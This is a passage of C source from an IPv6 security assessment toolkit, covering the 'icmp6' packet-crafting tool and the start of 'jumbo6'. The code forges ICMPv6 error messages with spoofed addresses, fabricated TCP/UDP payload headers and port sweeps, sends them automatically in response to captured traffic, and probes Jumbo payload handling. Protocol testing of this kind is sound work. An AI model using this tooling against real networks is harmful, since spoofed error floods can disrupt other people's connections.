&(pkt_ipv6->ip6_src))){ if(idata.verbose_f>1) print_filter_result(&idata, pktdata, BLOCKED); continue; } } if(filters.nblockdst){ if(match_ipv6(filters.blockdst, filters.blockdstlen, filters.nblockdst, &(pkt_ipv6->ip6_dst))){ if(idata.verbose_f>1) print_filter_result(&idata, pktdata, BLOCKED); continue; } } if(idata.type == DLT_EN10MB && !(idata.flags & IFACE_LOOPBACK)){ if(filters.nacceptlinksrc){ if(match_ether(filters.acceptlinksrc, filters.nacceptlinksrc, &(pkt_ether->src))) accepted_f=1; } if(filters.nacceptlinkdst && !accepted_f){ if(match_ether(filters.acceptlinkdst, filters.nacceptlinkdst, &(pkt_ether->dst))) accepted_f= 1; } } if(filters.nacceptsrc && !accepted_f){ if(match_ipv6(filters.acceptsrc, filters.acceptsrclen, filters.nacceptsrc, &(pkt_ipv6->ip6_src))) accepted_f= 1; } if(filters.nacceptdst && !accepted_f){ if(match_ipv6(filters.acceptdst, filters.acceptdstlen, filters.nacceptdst, &(pkt_ipv6->ip6_dst))) accepted_f=1; } if(filters.acceptfilters_f && !accepted_f){ if(idata.verbose_f>1) print_filter_result(&idata, pktdata, BLOCKED); continue; } if(idata.verbose_f>1) print_filter_result(&idata, pktdata, ACCEPTED); /* Send a Neighbor Advertisement */ send_packet(&idata, pktdata, pkthdr); } } } exit(EXIT_SUCCESS); } if(!idata.dstaddr_f && !listen_f){ puts("Error: Nothing to send! (key parameters left unspecified, and not using listening mode)"); exit(EXIT_FAILURE); } exit(EXIT_SUCCESS); } /* * Function: init_packet_data() * * Initialize the contents of the attack packet (Ethernet header, IPv6 Header, and ICMPv6 header) * that are expected to remain constant for the specified attack. */ void init_packet_data(struct iface_data *idata){ ethernet= (struct ether_header *) buffer; dlt_null= (struct dlt_null *) buffer; v6buffer = buffer + idata->linkhsize; ipv6 = (struct ip6_hdr *) v6buffer; if(idata->type == DLT_EN10MB){ ethernet->ether_type = htons(ETHERTYPE_IPV6); if(!(idata->flags & IFACE_LOOPBACK)){ ethernet->src = idata->hsrcaddr; ethernet->dst = idata->hdstaddr; } } else if(idata->type == DLT_NULL){ dlt_null->family= PF_INET6; } #if defined (__OpenBSD__) else if(idata->type == DLT_LOOP){ dlt_null->family= htonl(PF_INET6); } #endif ipv6->ip6_flow=0; ipv6->ip6_vfc= 0x60; ipv6->ip6_hlim= hoplimit; ipv6->ip6_src= idata->srcaddr; ipv6->ip6_dst= idata->dstaddr; prev_nh = (unsigned char *) &(ipv6->ip6_nxt); ptr = (unsigned char *) v6buffer + MIN_IPV6_HLEN; if(hbhopthdr_f){ hbhopthdrs=0; while(hbhopthdrs < nhbhopthdr){ if((ptr+ hbhopthdrlen[hbhopthdrs]) > (v6buffer+ idata->mtu)){ puts("Packet too large while processing HBH Opt. Header"); exit(EXIT_FAILURE); } *prev_nh = IPPROTO_HOPOPTS; prev_nh = ptr; memcpy(ptr, hbhopthdr[hbhopthdrs], hbhopthdrlen[hbhopthdrs]); ptr = ptr + hbhopthdrlen[hbhopthdrs]; hbhopthdrs++; } } if(dstoptuhdr_f){ dstoptuhdrs=0; while(dstoptuhdrs < ndstoptuhdr){ if((ptr+ dstoptuhdrlen[dstoptuhdrs]) > (v6buffer+ idata->mtu)){ puts("Packet too large while processing Dest. Opt. Header (Unfrag. Part)"); exit(EXIT_FAILURE); } *prev_nh = IPPROTO_DSTOPTS; prev_nh = ptr; memcpy(ptr, dstoptuhdr[dstoptuhdrs], dstoptuhdrlen[dstoptuhdrs]); ptr = ptr + dstoptuhdrlen[dstoptuhdrs]; dstoptuhdrs++; } } /* Everything that follows is the Fragmentable Part of the packet */ fragpart = ptr; if(fragh_f){ /* Check that we are able to send the Unfragmentable Part, together with a Fragment Header and a chunk data over our link layer */ if( (fragpart+sizeof(fraghdr)+nfrags) > (v6buffer+ idata->mtu)){ printf("Unfragmentable part too large for current MTU (%u bytes)\n", idata->mtu); exit(EXIT_FAILURE); } /* We prepare a separate Fragment Header, but we do not include it in the packet to be sent. This Fragment Header will be used (an assembled with the rest of the packet by the send_packet() function. */ memset(&fraghdr, 0, FRAG_HDR_SIZE); *prev_nh = IPPROTO_FRAGMENT; prev_nh = (unsigned char *) &fraghdr; } if(dstopthdr_f){ dstopthdrs=0; while(dstopthdrs < ndstopthdr){ if((ptr+ dstopthdrlen[dstopthdrs]) > (v6buffer+idata->max_packet_size)){ puts("Packet too large while processing Dest. Opt. Header (should be using the Frag. option?)"); exit(EXIT_FAILURE); } *prev_nh = IPPROTO_DSTOPTS; prev_nh = ptr; memcpy(ptr, dstopthdr[dstopthdrs], dstopthdrlen[dstopthdrs]); ptr = ptr + dstopthdrlen[dstopthdrs]; dstopthdrs++; } } *prev_nh = IPPROTO_ICMPV6; if( (ptr+sizeof(struct icmp6_hdr)) > (v6buffer+ idata->max_packet_size)){ puts("Packet too large while inserting ICMPv6 header (should be using Frag. option?)"); exit(EXIT_FAILURE); } icmp6= (struct icmp6_hdr *) ptr; icmp6->icmp6_type = icmp6type; icmp6->icmp6_code = icmp6code; switch(icmp6type){ case ICMP6_PACKET_TOO_BIG: icmp6->icmp6_mtu= htonl(mtu); break; case ICMP6_PARAM_PROB: icmp6->icmp6_pptr=htonl(pointer); break; case ICMP6_TIME_EXCEEDED: case ICMP6_DST_UNREACH: default: icmp6->icmp6_data32[0]=0; break; } ptr += sizeof(struct icmp6_hdr); startofprefixes=ptr; } /* * Function: send_packet() * * Initialize the remaining fields of the Neighbor Advertisement Message, and * send the attack packet(s). */ void send_packet(struct iface_data *idata, const u_char *pktdata, struct pcap_pkthdr * pkthdr){ if(pktdata != NULL){ /* Sending a Redirect in response to a received packet */ pkt_ether = (struct ether_header *) pktdata; pkt_ipv6 = (struct ip6_hdr *)((char *) pkt_ether + idata->linkhsize); /* If the IPv6 Source Address of the incoming Neighbor Solicitation is the unspecified address (::), the Neighbor Advertisement must be directed to the IPv6 all-nodes multicast address (and the Ethernet Destination address should be 33:33:33:00:00:01). Otherwise, the Neighbor Advertisement is sent to the IPv6 Source Address (and Ethernet Source Address) of the incoming Neighbor Solicitation message */ pkt_ipv6addr = &(pkt_ipv6->ip6_src); /* We don't send any packets if the Source Address of the captured packet is the unspecified address. */ if(IN6_IS_ADDR_UNSPECIFIED(pkt_ipv6addr)){ return; } else{ ipv6->ip6_dst = pkt_ipv6->ip6_src; if(idata->type == DLT_EN10MB && !(idata->flags & IFACE_LOOPBACK)) ethernet->dst = pkt_ether->src; } pkt_ipv6addr = &(pkt_ipv6->ip6_dst); /* We respond to packets sent to a multicast address only if the tool has been explicitly instructed to do so. */ if(IN6_IS_ADDR_MULTICAST(pkt_ipv6addr) && !respmcast_f) return; } targetport= targetportl; do{ peerport= peerportl; do{ ptr=startofprefixes; /* We include a Redirected Header by default */ if(!nopayload_f){ /* The amount of data that we include in the Redirected Header depends on a number of factors: a) If a specific amount has been specified, we include up to that amount of data (i.e., provided it is available from the captured packet) b) If our packet has not yet exceeded the minimum IPv6 MTU (1280 bytes), we include as many bytes as possible without exceeding that size. c) If our packet already exceeds the minimum IPv6 MTU, we include at most 68 bytes */ if(pktdata != NULL){ if(rhlength_f){ rhbytes= rhlength; } else{ currentsize= ptr - (unsigned char *)ipv6; if(currentsize > 1280) rhbytes=48; else rhbytes= 1280- currentsize; } pktbytes= pkthdr->caplen; if( rhbytes > pktbytes) rhbytes= pktbytes; rhbytes= (rhbytes>>3) << 3; if( (ptr+rhbytes) > (v6buffer+idata->max_packet_size)){ puts("Packet Too Large while inserting ICMPv6 payload"); exit(EXIT_FAILURE); } memcpy(ptr, pkt_ipv6, rhbytes); ptr+= rhbytes; } else{ /* The ICMPv6 Error is *not* being sent in response to a received packet */ if(rhlength_f){ rhbytes= rhlength; } else{ currentsize= ptr - (unsigned char *)ipv6; if(currentsize > 1280) rhbytes=48; else rhbytes= 1280- currentsize; } rhbytes= (rhbytes>>3) << 3; if( (ptr+rhbytes) > (v6buffer+idata->max_packet_size)){ puts("Packet Too Large while inserting Redirected Header Option"); exit(EXIT_FAILURE); } rhipv6 = (struct ip6_hdr *) rhbuff; rhipv6->ip6_flow= 0; rhipv6->ip6_vfc= 0x60; rhipv6->ip6_hlim= ip6hoplimit; rhipv6->ip6_src= targetaddr; rhipv6->ip6_dst= peeraddr; rhipv6->ip6_plen= htons(ip6length); if(rhtcp_f || rhdefault_f){ rhipv6->ip6_nxt= IPPROTO_TCP; rhtcp= (struct tcp_hdr *) (rhbuff + sizeof(struct ip6_hdr)); memset(rhtcp, 0, sizeof(struct tcp_hdr)); rhtcp->th_sport= htons((uint16_t) targetport); rhtcp->th_dport= htons((uint16_t) peerport); rhtcp->th_seq = htonl(tcpseq); rhtcp->th_ack= htonl(tcpack); rhtcp->th_flags= tcpflags; rhtcp->th_urp= htons(tcpurg); rhtcp->th_win= htons(tcpwin); rhtcp->th_off= MIN_TCP_HLEN >> 2; if(rhbytes < (MIN_IPV6_HLEN + MIN_TCP_HLEN)){ rhtcp->th_sum= random(); memcpy(ptr, rhbuff, rhbytes); ptr+= rhbytes; } else{ /* We will compute the TCP checksum */ rhtcp->th_sum= 0; /* We now reuse the rhipv6 and rhtcp variables to point to the IPv6 and TCP header of the packet to be sent */ rhipv6= (struct ip6_hdr *) ptr; rhtcp= (struct tcp_hdr *) ( (char *) rhipv6 + sizeof(struct ip6_hdr)); memcpy(ptr, rhbuff, MIN_IPV6_HLEN+MIN_TCP_HLEN); ptr += MIN_IPV6_HLEN+MIN_TCP_HLEN; rhbytes -= MIN_IPV6_HLEN+MIN_TCP_HLEN; while(rhbytes>=4){ *(uint32_t *)ptr = random(); ptr += sizeof(uint32_t); rhbytes -= sizeof(uint32_t); } if(ip6length_f) rhipv6->ip6_plen= htons(ip6length); else rhipv6->ip6_plen= htons(ptr - ((unsigned char *) rhipv6 + sizeof(struct ip6_hdr))); rhtcp->th_sum= in_chksum(rhipv6, rhtcp, (ptr - (unsigned char *) rhtcp), IPPROTO_TCP); } } else if(rhudp_f){ rhipv6->ip6_nxt= IPPROTO_UDP; rhudp = (struct udp_hdr *) (rhbuff + sizeof(struct ip6_hdr)); rhudp->uh_sport= htons(targetport); rhudp->uh_dport= htons(peerport); if(rhbytes < (MIN_IPV6_HLEN + MIN_UDP_HLEN)){ rhudp->uh_sum= random(); memcpy(ptr, rhbuff, rhbytes); ptr+= rhbytes; } else{ /* We will compute the UDP checksum */ rhudp->uh_sum= 0; /* We now reuse the rhipv6 and rhudp variables to point to the IPv6 and TCP header of the packet to be sent */ rhipv6= (struct ip6_hdr *) ptr; rhudp= (struct udp_hdr *) ( (char *) rhipv6 + sizeof(struct ip6_hdr)); memcpy(ptr, rhbuff, MIN_IPV6_HLEN+MIN_UDP_HLEN); ptr += (MIN_IPV6_HLEN+MIN_UDP_HLEN); rhbytes -= MIN_IPV6_HLEN+MIN_UDP_HLEN; while(rhbytes>=4){ *(uint32_t *)ptr = random(); ptr += sizeof(uint32_t); rhbytes -= sizeof(uint32_t); } if(!ip6length_f) rhipv6->ip6_plen= htons(ptr - ((unsigned char *) rhipv6 + sizeof(struct ip6_hdr))); rhudp->uh_ulen= htons(ptr - ((unsigned char *) rhipv6 + sizeof(struct ip6_hdr))); rhudp->uh_sum= in_chksum(rhipv6, rhudp, (ptr - (unsigned char *) rhudp), IPPROTO_UDP); } } else if(rhicmp6_f){ rhipv6->ip6_nxt= IPPROTO_ICMPV6; rhicmp6 = (struct icmp6_hdr *) (rhbuff + sizeof(struct ip6_hdr)); rhicmp6->icmp6_type = ICMP6_ECHO_REQUEST; rhicmp6->icmp6_code = 0; rhicmp6->icmp6_data16[0]= random(); /* Identifier */ rhicmp6->icmp6_data16[1]= random(); /* Sequence Number */ if(rhbytes <= (MIN_IPV6_HLEN + MIN_ICMP6_HLEN)){ rhicmp6->icmp6_cksum = random(); memcpy(ptr, rhbuff, rhbytes); ptr+= rhbytes; } else{ rhicmp6->icmp6_cksum = 0; /* We now reuse the rhipv6 and rhicmp6 variables to point to the IPv6 and ICMPv6 header of the packet to be sent */ rhipv6= (struct ip6_hdr *) ptr; rhicmp6= (struct icmp6_hdr *) ( (char *) rhipv6 + sizeof(struct ip6_hdr)); memcpy(ptr, rhbuff, MIN_IPV6_HLEN+MIN_ICMP6_HLEN); ptr += MIN_IPV6_HLEN+MIN_ICMP6_HLEN; rhbytes -= MIN_IPV6_HLEN+MIN_ICMP6_HLEN; while(rhbytes>=4){ *(uint32_t *)ptr = random(); ptr += sizeof(uint32_t); rhbytes -= sizeof(uint32_t); } if(!ip6length_f) rhipv6->ip6_plen= htons(ptr - ((unsigned char *) rhipv6 + sizeof(struct ip6_hdr))); rhicmp6->icmp6_cksum= in_chksum(rhipv6, rhicmp6, (ptr - (unsigned char *) rhicmp6), IPPROTO_ICMPV6); } } } } icmp6->icmp6_cksum = 0; icmp6->icmp6_cksum = in_chksum(v6buffer, icmp6, ptr-((unsigned char *)icmp6), IPPROTO_ICMPV6); if(!fragh_f){ ipv6->ip6_plen = htons((ptr - v6buffer) - MIN_IPV6_HLEN); if((nw=pcap_inject(idata->pfd, buffer, ptr - buffer)) == -1){ printf("pcap_inject(): %s\n", pcap_geterr(idata->pfd)); exit(EXIT_FAILURE); } if(nw != (ptr-buffer)){ printf("pcap_inject(): only wrote %lu bytes (rather than %lu bytes)\n", (LUI) nw, \ (LUI) (ptr-buffer)); exit(EXIT_FAILURE); } } else{ ptrend= ptr; ptr= fragpart; fptr = fragbuffer; fipv6 = (struct ip6_hdr *) (fragbuffer + idata->linkhsize); fptrend = fptr + idata->linkhsize+MIN_IPV6_HLEN+MAX_IPV6_PAYLOAD; memcpy(fptr, buffer, fragpart-buffer); fptr = fptr + (fragpart-buffer); if( (fptr+FRAG_HDR_SIZE)> fptrend){ puts("Unfragmentable Part is Too Large"); exit(EXIT_FAILURE); } memcpy(fptr, (char *) &fraghdr, FRAG_HDR_SIZE); fh= (struct ip6_frag *) fptr; fh->ip6f_ident=random(); startoffragment = fptr + FRAG_HDR_SIZE; /* * Check that the selected fragment size is not larger than the largest * fragment size that can be sent */ if(nfrags <= (fptrend - fptr)) fragsize=nfrags; else fragsize= (fptrend-fptr) & IP6F_OFF_MASK; m=IP6F_MORE_FRAG; while((ptr< ptrend) && m==IP6F_MORE_FRAG){ fptr= startoffragment; if( (ptrend-ptr) <= fragsize){ fragsize= ptrend-ptr; m=0; } memcpy(fptr, ptr, fragsize); fh->ip6f_offlg = (htons(ptr-fragpart) & IP6F_OFF_MASK) | m; ptr+=fragsize; fptr+=fragsize; fipv6->ip6_plen = htons((fptr - fragbuffer) - MIN_IPV6_HLEN - idata->linkhsize); if((nw=pcap_inject(idata->pfd, fragbuffer, fptr - fragbuffer)) == -1){ printf("pcap_inject(): %s\n", pcap_geterr(idata->pfd)); exit(EXIT_FAILURE); } if(nw != (fptr- fragbuffer)){ printf("pcap_inject(): only wrote %lu bytes (rather than %lu bytes)\n", \ (LUI) nw, (LUI) (ptr-buffer)); exit(EXIT_FAILURE); } } /* Sending fragments */ } /* Sending fragmented datagram */ peerport++; }while(peerport<=peerporth); targetport++; }while(targetport<=targetporth); } /* * Function: usage() * * Prints the syntax of the icmp6 tool */ void usage(void){ puts("usage: icmp6 [-i INTERFACE] [-s SRC_ADDR[/LEN]] [-d DST_ADDR]\n" " [-S LINK_SRC_ADDR] [-D LINK-DST-ADDR] [-c HOP_LIMIT] [-y FRAG_SIZE]\n" " [-u DST_OPT_HDR_SIZE] [-U DST_OPT_U_HDR_SIZE] [-H HBH_OPT_HDR_SIZE]\n" " [-t TYPE[:CODE] | -e CODE | -A CODE -V CODE -R CODE] [-r TARGET_ADDR]\n" " [-x PEER_ADDR] [-c HOP_LIMIT] [-m MTU] [-O POINTER] [-p PAYLOAD_TYPE]\n" " [-P PAYLOAD_SIZE] [-n] [-a SRC_PORTL[:SRC_PORTH]]\n" " [-o DST_PORTL[:DST_PORTH]] [-X TCP_FLAGS] [-q TCP_SEQ] [-Q TCP_ACK]\n" " [-V TCP_URP] [-w TCP_WIN] [-M] [-j PREFIX[/LEN]] [-k PREFIX[/LEN]]\n" " [-J LINK_ADDR] [-K LINK_ADDR] [-b PREFIX[/LEN]] [-g PREFIX[/LEN]]\n" " [-B LINK_ADDR] [-G LINK_ADDR] [-f] [-L | -l] [-z] [-v] [-h]"); } /* * Function: print_help() * * Prints help information for the icmp6 tool */ void print_help(void){ puts(SI6_TOOLKIT); puts("icmp6: Security assessment tool for attack vectors based on ICMPv6 error messages\n"); usage(); puts("\nOPTIONS:\n" " --interface, -i Network interface\n" " --src-address, -s IPv6 Source Address\n" " --dst-address, -d IPv6 Destination Address\n" " --hop-limit, -c IPv6 Hop Limit\n" " --frag-hdr. -y Fragment Header\n" " --dst-opt-hdr, -u Destination Options Header (Fragmentable Part)\n" " --dst-opt-u-hdr, -U Destination Options Header (Unfragmentable Part)\n" " --hbh-opt-hdr, -H Hop by Hop Options Header\n" " --link-src-address, -S Link-layer Destination Address\n" " --link-dst-address, -D Link-layer Source Address\n" " --icmp6, -t ICMPv6 Type:Code\n" " --icmp6-dest-unreach, -e ICMPv6 Destination Unreachable\n" " --icmp6-packet-too-big, -E ICMPv6 Packet Too Big\n" " --icmp6-time-exceeded, -A ICMPv6 Time Exceeeded\n" " --icmp6-param-problem, -R ICMPv6 Parameter Problem\n" " --mtu, -m Next-Hop MTU (ICMPv6 Packet Too Big)\n" " --pointer, -O Pointer (ICMPv6 Parameter Problem\n" " --payload-type, -p Redirected Header Payload Type\n" " --payload-size, -P Redirected Header Payload Size\n" " --no-payload, -n Do not include a Redirected Header Option\n" " --ipv6-hlim, -C ICMPv6 Payload's Hop Limit\n" " --target-addr, -r ICMPv6 Payload's IPv6 Source Address\n" " --peer-addr, -x ICMPv6 Payload's IPv6 Destination Address\n" " --target-port, -o ICMPv6 Payload's Source Port\n" " --peer-port, -a ICMPv6 Payload's Destination Port\n" " --tcp-flags, -X ICMPv6 Payload's TCP Flags\n" " --tcp-seq, -q ICMPv6 Payload's TCP SEQ Number\n" " --tcp-ack, -Q ICMPv6 Payload's TCP ACK Number\n" " --tcp-urg, -V ICMPv6 Payload's TCP URG Pointer\n" " --tcp-win, -w ICMPv6 Payload's TCP Window\n" " --resp-mcast, -M Respond to Multicast Packets\n" " --block-src, -j Block IPv6 Source Address prefix\n" " --block-dst, -k Block IPv6 Destination Address prefix\n" " --block-link-src, -J Block Ethernet Source Address\n" " --block-link-dst, -K Block Ethernet Destination Address\n" " --accept-src, -b Accept IPv6 Source Addres prefix\n" " --accept-dst, -g Accept IPv6 Destination Address prefix\n" " --accept-link-src, -B Accept Ethernet Source Address\n" " --accept-link-dst, -G Accept Ethernet Destination Address\n" " --sanity-filters, -f Add sanity filters\n" " --listen, -L Listen to incoming traffic\n" " --loop, -l Send periodic ICMPv6 error messages\n" " --sleep, -z Pause between sending ICMPv6 error messages\n" " --help, -h Print help for the icmp6 tool\n" " --verbose, -v Be verbose\n" "\n" " Programmed by Fernando Gont for SI6 Networks \n" " Please send any bug reports to \n" ); } /* * Function: print_attack_info() * * Prints attack details (when the verbose ("-v") option is specified). */ void print_attack_info(struct iface_data *idata){ puts( "icmp6: Security assessment tool for attack vectors based on ICMPv6 messages\n"); if(idata->type == DLT_EN10MB && !(idata->flags & IFACE_LOOPBACK)){ if(ether_ntop(&(idata->hsrcaddr), plinkaddr, sizeof(plinkaddr)) == 0){ puts("ether_ntop(): Error converting address"); exit(EXIT_FAILURE); } printf("Ethernet Source Address: %s%s\n", plinkaddr, ((!idata->hsrcaddr_f)?" (randomized)":"")); /* Ethernet Destination Address only used if a IPv6 Destination Address or an Ethernet Destination Address were specified. */ if(idata->dstaddr_f){ if(ether_ntop(&(idata->hdstaddr), plinkaddr, sizeof(plinkaddr)) == 0){ puts("ether_ntop(): Error converting address"); exit(EXIT_FAILURE); } printf("Ethernet Destination Address: %s%s\n", plinkaddr, \ ((!idata->hdstaddr_f)?" (automatically selected)":"")); } } if(idata->srcaddr_f){ if(inet_ntop(AF_INET6, &(idata->srcaddr), psrcaddr, sizeof(psrcaddr)) == NULL){ puts("inet_ntop(): Error converting IPv6 Source Address to presentation format"); exit(EXIT_FAILURE); } /* XXX Should really differentate between 'automatically selected' and 'randomized' */ printf("IPv6 Source Address: %s%s\n", psrcaddr, ((idata->srcaddr_f != TRUE)?" (automatically selected)":"")); } if(idata->dstaddr_f){ if(inet_ntop(AF_INET6, &(idata->dstaddr), pdstaddr, sizeof(pdstaddr)) == NULL){ puts("inet_ntop(): Error converting IPv6 Destination Address to presentation format"); exit(EXIT_FAILURE); } printf("IPv6 Destination Address: %s\n", pdstaddr); } printf("IPv6 Hop Limit: %u%s\n", hoplimit, (hoplimit_f)?"":" (randomized)"); for(i=0; idstaddr_f){ printf("Payload Type: IPv6/TCP%s\n", (rhdefault_f?" (default)":"")); } else if(rhudp_f && idata->dstaddr_f){ puts("Payload Type: IPv6/UDP"); } else if(rhicmp6_f && idata->dstaddr_f){ puts("Payload Type: IPv6/ICMPv6 Echo Request"); } if(inet_ntop(AF_INET6, &targetaddr, pv6addr, sizeof(pv6addr)) == NULL){ puts("inet_ntop(): Error converting Redirected Address to presentation format"); exit(EXIT_FAILURE); } if(idata->srcaddr_f){ printf("Source Address: %s%s\n", pv6addr, ((!targetaddr_f)?" (automatically-selected)":"")); } if(inet_ntop(AF_INET6, &peeraddr, pv6addr, sizeof(pv6addr)) == NULL){ puts("inet_ntop(): Error converting Redirect Target Address to presentation format"); exit(EXIT_FAILURE); } if(idata->dstaddr_f){ printf("Destination Address: %s%s\n", pv6addr, ((!peeraddr_f)?" (randomized)":"")); } printf("Hop Limit: %u%s\n", ip6hoplimit, (ip6hoplimit_f)?"":" (randomized)"); if((rhtcp_f || rhdefault_f) && idata->dstaddr_f){ if(targetporth_f){ printf("Source Port: %u-%u\t", targetportl, targetporth); } else{ printf("Source Port: %u%s\t", targetportl, (targetportl_f?"":" (randomized)")); } if(peerporth_f){ printf("Destination Port: %u-%u\t", peerportl, peerporth); } else{ printf("Destination Port: %u%s\n", peerportl, (peerportl_f?"":" (randomized)")); } printf("SEQ Number: %u%s\tACK Number: %u%s\n", tcpseq, (tcpseq_f?"":" (randomized)"), \ tcpack, (tcpack_f?"":" (randomized)")); printf("Flags: %s%s%s%s%s%s%s%s\t", ((tcpflags & TH_FIN)?"F":""), ((tcpflags & TH_SYN)?"S":""), \ ((tcpflags & TH_RST)?"R":""), ((tcpflags & TH_PUSH)?"P":""),\ ((tcpflags & TH_ACK)?"A":""), ((tcpflags & TH_URG)?"U":""),\ ((!tcpflags)?"none":""), ((!tcpflags_f)?" (default)":"")); printf("Window: %u%s\tURG Pointer: %u%s\n", tcpwin, (tcpwin_f?"":" (randomized)"), \ tcpurg, (tcpurg_f?"":" (default)")); } else if(rhudp_f && idata->dstaddr_f){ if(targetporth_f){ printf("Source Port: %u-%u\t", targetportl, targetporth); } else{ printf("Source Port: %u%s\t", targetportl, (targetportl_f?"":" (randomized)")); } if(peerporth_f){ printf("Destination Port: %u-%u\n", peerportl, peerporth); } else{ printf("Destination Port: %u%s\n", peerportl, (peerportl_f?"":" (randomized)")); } } else if(rhicmp6_f && idata->dstaddr_f){ printf("Identifier: %u%s\tSequence Number: %u%s\n", icmp6id, (icmp6id_f?"":" (randomized)"), \ icmp6seq, (icmp6seq_f?"":" (randomized)")); } } ipv6toolkit-2.0+ds.1/tools/icmp6.h000066400000000000000000000000561254360455000167420ustar00rootroot00000000000000/* * Header file for the icmp6 tool * */ ipv6toolkit-2.0+ds.1/tools/ipv6toolkit.h000066400000000000000000000001701254360455000202130ustar00rootroot00000000000000#define SI6_TOOLKIT "SI6 Networks' IPv6 Toolkit v2.0 (Guille)" #define MAX_CMDLINE_OPT_LEN 40 #define DATE_STR_LEN 40 ipv6toolkit-2.0+ds.1/tools/jumbo6.c000066400000000000000000001020631254360455000171220ustar00rootroot00000000000000/* * jumbo6: A security assessment tool that exploits potential flaws in the * processing of IPv6 Jumbo payloads * * Copyright (C) 2011-2015 Fernando Gont * * Programmed by Fernando Gont for SI6 Networks * * This program is free software: you can redistribute it and/or modify * it under the terms of the GNU General Public License as published by * the Free Software Foundation, either version 3 of the License, or * (at your option) any later version. * * This program is distributed in the hope that it will be useful, * but WITHOUT ANY WARRANTY; without even the implied warranty of * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the * GNU General Public License for more details. * * You should have received a copy of the GNU General Public License * along with this program. If not, see . * * Build with: make jumbo6 * * The libpcap library must be previously installed on your system. * * Please send any bug reports to Fernando Gont */ #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include "jumbo6.h" #include "libipv6.h" #include "ipv6toolkit.h" /* Function prototypes */ void init_packet_data(struct iface_data *); int send_packet(struct iface_data *, struct pcap_pkthdr *, const u_char *); void print_icmp6_echo(struct iface_data *, struct pcap_pkthdr *, const u_char *); void print_icmp6_error(struct iface_data *, struct pcap_pkthdr *, const u_char *); void print_attack_info(struct iface_data *); void usage(void); void print_help(void); int valid_icmp6_response(struct iface_data *, struct pcap_pkthdr *, const u_char *); /* Data structures for packets read from the wire */ struct pcap_pkthdr *pkthdr; const u_char *pktdata; unsigned char *pkt_end; struct ether_header *pkt_ether; struct ip6_hdr *pkt_ipv6; struct icmp6_hdr *pkt_icmp6; struct nd_neighbor_solicit *pkt_ns; struct in6_addr *pkt_ipv6addr; unsigned int pktbytes; bpf_u_int32 my_netmask; bpf_u_int32 my_ip; struct bpf_program pcap_filter; char dev[64], errbuf[PCAP_ERRBUF_SIZE]; unsigned char buffer[65556], buffrh[MIN_IPV6_HLEN + MIN_TCP_HLEN]; unsigned char *v6buffer, *ptr, *startofprefixes; char *pref; struct ip6_hdr *ipv6; struct icmp6_hdr *icmp6; struct ether_header *ethernet; struct nd_opt_tlla *tllaopt; struct in6_addr targetaddr; struct ether_addr linkaddr[MAX_TLLA_OPTION]; unsigned int nlinkaddr=0, linkaddrs; char *lasts, *rpref; char *charptr; size_t nw; unsigned long ul_res, ul_val; unsigned int i, j, startrand; unsigned int skip; unsigned int sources, nsources, ports, nports, nsleep; uint16_t mask, ip6length; uint32_t jplength, *jplengthptr, *fjplengthptr, icmp6psize; uint8_t hoplimit; char plinkaddr[ETHER_ADDR_PLEN]; char psrcaddr[INET6_ADDRSTRLEN], pdstaddr[INET6_ADDRSTRLEN], pv6addr[INET6_ADDRSTRLEN]; unsigned char floodt_f=0; unsigned char listen_f=0, accepted_f=0, loop_f=0, sleep_f=0, localaddr_f=0; unsigned char hoplimit_f=0, ip6length_f=0, jplength_f=0, icmp6psize_f=0; /* Support for Extension Headers */ unsigned int dstopthdrs, dstoptuhdrs, hbhopthdrs; char hbhopthdr_f=0, dstoptuhdr_f=0, dstopthdr_f=0; unsigned char *dstopthdr[MAX_DST_OPT_HDR], *dstoptuhdr[MAX_DST_OPT_U_HDR]; unsigned char *hbhopthdr[MAX_HBH_OPT_HDR]; unsigned int dstopthdrlen[MAX_DST_OPT_HDR], dstoptuhdrlen[MAX_DST_OPT_U_HDR]; unsigned int hbhopthdrlen[MAX_HBH_OPT_HDR], m, pad; struct ip6_frag fraghdr, *fh; struct ip6_hdr *fipv6; unsigned char fragh_f=0; unsigned char fragbuffer[ETHER_HDR_LEN+MIN_IPV6_HLEN+MAX_IPV6_PAYLOAD]; unsigned char *fragpart, *fptr, *fptrend, *ptrend, *ptrhdr, *ptrhdrend; unsigned int hdrlen, ndstopthdr=0, nhbhopthdr=0, ndstoptuhdr=0; unsigned int nfrags, fragsize; unsigned char *prev_nh, *startoffragment; struct iface_data idata; int main(int argc, char **argv){ extern char *optarg; char *endptr; /* Used by strtoul() */ fd_set sset, rset; struct timeval timeout; struct target_ipv6 targetipv6; int r, sel; time_t curtime, start, lastecho=0; static struct option longopts[] = { {"interface", required_argument, 0, 'i'}, {"link-src-addr", required_argument, 0, 'S'}, {"link-dst-addr", required_argument, 0, 'D'}, {"src-address", required_argument, 0, 's'}, {"dst-address", required_argument, 0, 'd'}, {"hop-limit", required_argument, 0, 'A'}, {"dst-opt-hdr", required_argument, 0, 'u'}, {"dst-opt-u-hdr", required_argument, 0, 'U'}, {"hbh-opt-hdr", required_argument, 0, 'H'}, {"frag-hdr", required_argument, 0, 'y'}, {"ipv6-length", required_argument, 0, 'q'}, {"jumbo-length", required_argument, 0, 'Q'}, {"payload-size", required_argument, 0, 'P'}, {"loop", no_argument, 0, 'l'}, {"sleep", required_argument, 0, 'z'}, {"listen", no_argument, 0, 'L'}, {"verbose", no_argument, 0, 'v'}, {"help", no_argument, 0, 'h'}, {0, 0, 0, 0 } }; char shortopts[]= "i:s:d:A:u:U:H:y:S:D:q:Q:P:lz:Lvh"; char option; if(argc<=1){ usage(); exit(EXIT_FAILURE); } hoplimit=64+random()%180; init_iface_data(&idata); while((r=getopt_long(argc, argv, shortopts, longopts, NULL)) != -1) { option= r; switch(option) { case 'i': /* Interface */ strncpy(idata.iface, optarg, IFACE_LENGTH-1); idata.iface[IFACE_LENGTH-1]=0; idata.ifindex= if_nametoindex(idata.iface); idata.iface_f=TRUE; break; case 's': /* IPv6 Source Address */ if(idata.srcaddr_f){ puts("Error: Multiple '-s' options have been specified"); exit(EXIT_FAILURE); } if((charptr = strtok_r(optarg, "/", &lasts)) == NULL){ puts("Error in Source Address"); exit(EXIT_FAILURE); } if ( inet_pton(AF_INET6, charptr, &(idata.srcaddr)) <= 0){ puts("inet_pton(): Source Address not valid"); exit(EXIT_FAILURE); } idata.srcaddr_f = 1; if((charptr = strtok_r(NULL, " ", &lasts)) != NULL){ idata.srcpreflen = atoi(charptr); if(idata.srcpreflen>128){ puts("Prefix length error in IPv6 Source Address"); 